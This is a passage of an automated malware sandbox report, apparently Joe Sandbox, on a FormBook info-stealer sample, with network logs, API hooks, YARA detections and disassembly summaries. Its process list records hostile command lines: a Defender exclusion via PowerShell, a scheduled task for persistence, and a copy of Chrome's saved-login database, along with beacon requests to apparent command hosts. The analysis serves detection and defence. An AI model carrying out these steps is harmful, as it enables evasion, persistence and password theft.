64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.ballthingsez.com/co63/">here</a>.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      9192.168.2.54972034.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:45:33.908654928 CEST482OUTGET /co63/?aJElwV=7844uNirl1OmKo/iz3P/xC/n+TlWcrf11+et7B27/2a6MTbhGvfvyecJXVPFAq5Jbxq/&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.dlafluid.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:45:34.316102028 CEST482INHTTP/1.1 403 Forbidden
                                                      Server: openresty
                                                      Date: Thu, 20 Jul 2023 09:45:34 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 291
                                                      ETag: "64b05e78-123"
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      PeekMessageAINLINEexplorer.exe
                                                      PeekMessageWINLINEexplorer.exe
                                                      GetMessageWINLINEexplorer.exe
                                                      GetMessageAINLINEexplorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: user32.dll
                                                      Function NameHook TypeNew Data
                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE4
                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE4
                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE4
                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE4

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:11:43:05
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Imagebase:0x980000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Target ID:1
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Imagebase:0x800000
                                                      File size:430'592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Target ID:2
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:3
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Imagebase:0x800000
                                                      File size:430'592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Target ID:4
                                                      Start time:11:43:15
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:5
                                                      Start time:11:43:16
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp
                                                      Imagebase:0xc30000
                                                      File size:185'856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:6
                                                      Start time:11:43:16
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:9
                                                      Start time:11:43:18
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Imagebase:0xb50000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 24%, ReversingLabs

                                                      General

                                                      Target ID:10
                                                      Start time:11:43:22
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Imagebase:0xbe0000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                      General

                                                      Target ID:12
                                                      Start time:11:43:32
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmp
                                                      Imagebase:0xc30000
                                                      File size:185'856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:13
                                                      Start time:11:43:32
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:14
                                                      Start time:11:43:33
                                                      Start date:20/07/2023
                                                      Path:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      Imagebase:0x4f0000
                                                      File size:714'752 bytes
                                                      MD5 hash:D72C3BB3172D13AC1CFC172C389E52E5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:15
                                                      Start time:11:43:35
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff69bc80000
                                                      File size:3'933'184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:16
                                                      Start time:11:43:48
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                      Imagebase:0x1330000
                                                      File size:61'952 bytes
                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                                      General

                                                      Target ID:17
                                                      Start time:11:43:57
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                      Imagebase:0x11d0000
                                                      File size:232'960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:18
                                                      Start time:11:43:57
                                                      Start date:20/07/2023
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625'664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:11.1%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:115
                                                        Total number of Limit Nodes:6
                                                        execution_graph 13557 12599a0 13560 1259a98 13557->13560 13558 12599af 13561 1259aab 13560->13561 13562 1259ac3 13561->13562 13568 1259d20 13561->13568 13572 1259d10 13561->13572 13562->13558 13563 1259cc0 GetModuleHandleW 13565 1259ced 13563->13565 13564 1259abb 13564->13562 13564->13563 13565->13558 13570 1259d34 13568->13570 13569 1259d59 13569->13564 13570->13569 13576 1258d38 13570->13576 13573 1259d34 13572->13573 13574 1259d59 13573->13574 13575 1258d38 LoadLibraryExW 13573->13575 13574->13564 13575->13574 13577 1259f00 LoadLibraryExW 13576->13577 13579 1259f79 13577->13579 13579->13569 13580 125bdd0 13581 125be36 13580->13581 13585 125bf90 13581->13585 13588 125bf80 13581->13588 13582 125bee5 13586 125bfbe 13585->13586 13591 125a7e4 13585->13591 13586->13582 13589 125a7e4 DuplicateHandle 13588->13589 13590 125bfbe 13589->13590 13590->13582 13592 125bff8 DuplicateHandle 13591->13592 13593 125c08e 13592->13593 13593->13586 13594 12543c8 13595 12543da 13594->13595 13596 12543e6 13595->13596 13600 12544d8 13595->13600 13605 1253b9c 13596->13605 13598 1254405 13601 12544fd 13600->13601 13609 12545c8 13601->13609 13613 12545d8 13601->13613 13606 1253ba7 13605->13606 13621 1255b2c 13606->13621 13608 1256df1 13608->13598 13611 12545ff 13609->13611 13610 12546dc 13610->13610 13611->13610 13617 1254124 13611->13617 13615 12545ff 13613->13615 13614 12546dc 13614->13614 13615->13614 13616 1254124 CreateActCtxA 13615->13616 13616->13614 13618 1255668 CreateActCtxA 13617->13618 13620 125572b 13618->13620 13622 1255b37 13621->13622 13625 1255b84 13622->13625 13624 12570a5 13624->13608 13626 1255b8f 13625->13626 13629 1255bb4 13626->13629 13628 1257182 13628->13624 13630 1255bbf 13629->13630 13633 1255be4 13630->13633 13632 1257282 13632->13628 13635 1255bef 13633->13635 13634 12579dc 13634->13632 13635->13634 13638 125bb08 13635->13638 13649 125baf8 13635->13649 13640 125bb29 13638->13640 13639 125bb4d 13639->13634 13640->13639 13641 125bbed 13640->13641 13646 125bb08 2 API calls 13640->13646 13647 125baf8 2 API calls 13640->13647 13660 125bcb8 13640->13660 13664 125bc26 13640->13664 13668 125bc75 13640->13668 13642 125bcff 13641->13642 13672 125a75c 13641->13672 13642->13634 13646->13641 13647->13641 13650 125bb29 13649->13650 13651 125bb4d 13650->13651 13653 125bbed 13650->13653 13655 125bc75 2 API calls 13650->13655 13656 125bc26 2 API calls 13650->13656 13657 125bb08 2 API calls 13650->13657 13658 125baf8 2 API calls 13650->13658 13659 125bcb8 2 API calls 13650->13659 13651->13634 13652 125bcff 13652->13634 13653->13652 13654 125a75c 2 API calls 13653->13654 13654->13652 13655->13653 13656->13653 13657->13653 13658->13653 13659->13653 13661 125bcc5 13660->13661 13662 125a75c 2 API calls 13661->13662 13663 125bcff 13661->13663 13662->13663 13663->13641 13665 125bc18 13664->13665 13666 125a75c 2 API calls 13665->13666 13667 125bcff 13665->13667 13666->13667 13667->13641 13670 125bc18 13668->13670 13669 125bcff 13669->13641 13670->13668 13670->13669 13671 125a75c 2 API calls 13670->13671 13671->13669 13673 125a767 13672->13673 13675 125c9f8 13673->13675 13676 125c5b8 13673->13676 13675->13675 13677 125c5c3 13676->13677 13678 1255be4 2 API calls 13677->13678 13679 125ca67 13678->13679 13683 125e7e8 13679->13683 13689 125e7db 13679->13689 13680 125caa0 13680->13675 13685 125e865 13683->13685 13686 125e819 13683->13686 13684 125e825 13684->13680 13685->13680 13686->13684 13694 125ec57 13686->13694 13699 125ec68 13686->13699 13690 125e7e8 13689->13690 13691 125e825 13690->13691 13692 125ec57 2 API calls 13690->13692 13693 125ec68 2 API calls 13690->13693 13691->13680 13692->13691 13693->13691 13695 125ec26 13694->13695 13696 125ec62 13694->13696 13695->13685 13697 1259a98 LoadLibraryExW GetModuleHandleW 13696->13697 13698 125ec71 13697->13698 13698->13685 13700 1259a98 LoadLibraryExW GetModuleHandleW 13699->13700 13701 125ec71 13700->13701 13701->13685

                                                        Executed Functions

                                                        Function 01254124 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1254124-1255729 CreateActCtxA 3 1255732-125578c 0->3 4 125572b-1255731 0->4 11 125578e-1255791 3->11 12 125579b-125579f 3->12 4->3 11->12 13 12557a1-12557ad 12->13 14 12557b0 12->14 13->14 16 12557b1 14->16 16->16
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 01255719
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID: d<nm
                                                        • API String ID: 2289755597-1879898224
                                                        • Opcode ID: cb4abeaea79a9ea3df1077664125dd2e84e3a5d95bba2c3c8060675289b89d60
                                                        • Instruction ID: ca101d4b5be879d9c4f75c610347c3a0cda71c8f1163815cf8b2b74098da0211
                                                        • Opcode Fuzzy Hash: cb4abeaea79a9ea3df1077664125dd2e84e3a5d95bba2c3c8060675289b89d60
                                                        • Instruction Fuzzy Hash: 5B41F170C1071DCFDB24DFA9C984B9EBBB5BF48304F20806AD809AB250DBB46945CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0125565C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 17 125565c-1255729 CreateActCtxA 19 1255732-125578c 17->19 20 125572b-1255731 17->20 27 125578e-1255791 19->27 28 125579b-125579f 19->28 20->19 27->28 29 12557a1-12557ad 28->29 30 12557b0 28->30 29->30 32 12557b1 30->32 32->32
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 01255719
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID: d<nm
                                                        • API String ID: 2289755597-1879898224
                                                        • Opcode ID: afa26ea4e049f4495fb3ee2e131d8b226bf4e9f8574aa104e1608dfbd8aaf3bf
                                                        • Instruction ID: ac99ded50441c985b6efda4f09f16cf8091c5a7f7afe1b9815ebf943e61ac1f2
                                                        • Opcode Fuzzy Hash: afa26ea4e049f4495fb3ee2e131d8b226bf4e9f8574aa104e1608dfbd8aaf3bf
                                                        • Instruction Fuzzy Hash: D1410571C1071DCEDB14DFA9C984BDEBBB1BF48304F20816AD409AB251DB756946CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0125A7E4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 33 125a7e4-125c08c DuplicateHandle 35 125c095-125c0b2 33->35 36 125c08e-125c094 33->36 36->35
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0125BFBE,?,?,?,?,?), ref: 0125C07F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID: d<nm
                                                        • API String ID: 3793708945-1879898224
                                                        • Opcode ID: 2fb37de2a6a5e6ff9d3871cff1b4d950c621d6a5eeea17018e9ed8f28a810c8f
                                                        • Instruction ID: a2999202a01273d1b86fed0e8108766d44c728c7007c42f969fab1881cf8d225
                                                        • Opcode Fuzzy Hash: 2fb37de2a6a5e6ff9d3871cff1b4d950c621d6a5eeea17018e9ed8f28a810c8f
                                                        • Instruction Fuzzy Hash: BF21E3B59103099FDB10CFAAD984AEEBBF8EB48720F14841AE914A7310D374A954DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0125BFF3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 39 125bff3 40 125bff8-125c08c DuplicateHandle 39->40 41 125c095-125c0b2 40->41 42 125c08e-125c094 40->42 42->41
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0125BFBE,?,?,?,?,?), ref: 0125C07F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID: d<nm
                                                        • API String ID: 3793708945-1879898224
                                                        • Opcode ID: 87e06866fa3a47655327e2f0db05224274c966bb0684c7d84458815619d79014
                                                        • Instruction ID: 947dd7cae44dbcfb04ec9ea38964a13321c6d988a76b9d41ed06e6f4cbe789e7
                                                        • Opcode Fuzzy Hash: 87e06866fa3a47655327e2f0db05224274c966bb0684c7d84458815619d79014
                                                        • Instruction Fuzzy Hash: ED21E0B5900209AFDB10CFAAD984ADEBBF8EB48720F14841AE914A7310D374A954DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01258D38 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 45 1258d38-1259f40 47 1259f42-1259f45 45->47 48 1259f48-1259f77 LoadLibraryExW 45->48 47->48 49 1259f80-1259f9d 48->49 50 1259f79-1259f7f 48->50 50->49
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01259D59,00000800,00000000,00000000), ref: 01259F6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: d<nm
                                                        • API String ID: 1029625771-1879898224
                                                        • Opcode ID: e0de4d28765d00ec66d6ef50ebc5b8fedbd7357909fe731a1c51c40d47244a68
                                                        • Instruction ID: f452a34598b32acdb770eb796a2f693c1b67b75d4afebe3ffcab0c66a90b2d79
                                                        • Opcode Fuzzy Hash: e0de4d28765d00ec66d6ef50ebc5b8fedbd7357909fe731a1c51c40d47244a68
                                                        • Instruction Fuzzy Hash: C21117B2910309CFDB10CF9AC884BDEFBF4EB88714F14842AE915A7200C374A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01259EF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 53 1259ef8-1259f40 55 1259f42-1259f45 53->55 56 1259f48-1259f77 LoadLibraryExW 53->56 55->56 57 1259f80-1259f9d 56->57 58 1259f79-1259f7f 56->58 58->57
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01259D59,00000800,00000000,00000000), ref: 01259F6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
